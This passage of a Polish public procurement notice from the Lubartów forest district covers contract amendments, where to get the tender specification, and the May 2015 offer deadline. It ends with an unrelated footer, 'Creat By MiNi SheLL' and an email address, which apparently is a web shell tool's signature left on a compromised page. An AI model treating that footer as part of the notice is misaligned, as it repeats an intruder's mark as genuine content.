e) Zamawiający zastrzega sobie prawo zmiany ilościowej poszczególnych elementów umundurowania, przy zachowaniu ilości punktów oraz do wprowadzania do umowy zmian korzystnych dla Zamawiającego.
f) zmiana podwykonawców może być dokonana w sytuacji: na żądanie Zamawiającego w przypadku nienależytego wykonania powierzonych prac; na wniosek Wykonawcy w przypadku:nienależytego wykonywania powierzonych prac,innych obiektywnych okoliczności niezależnych od Wykonawcy (np. rezygnacji).</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.lasy.gov.pl/pl/bip/dg/rdlp_lublin/nadl_lubartow/zamowienia_publiczne<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Nadleśnictwo Lubartów
ul. Gen. Kleeberga 17
21-100 Lubartów.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 08.05.2015 godzina 09:00, miejsce: Nadleśnictwo Lubartów
ul. Gen. Kleeberga 17
21-100 Lubartów
pok. nr 2 - Sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com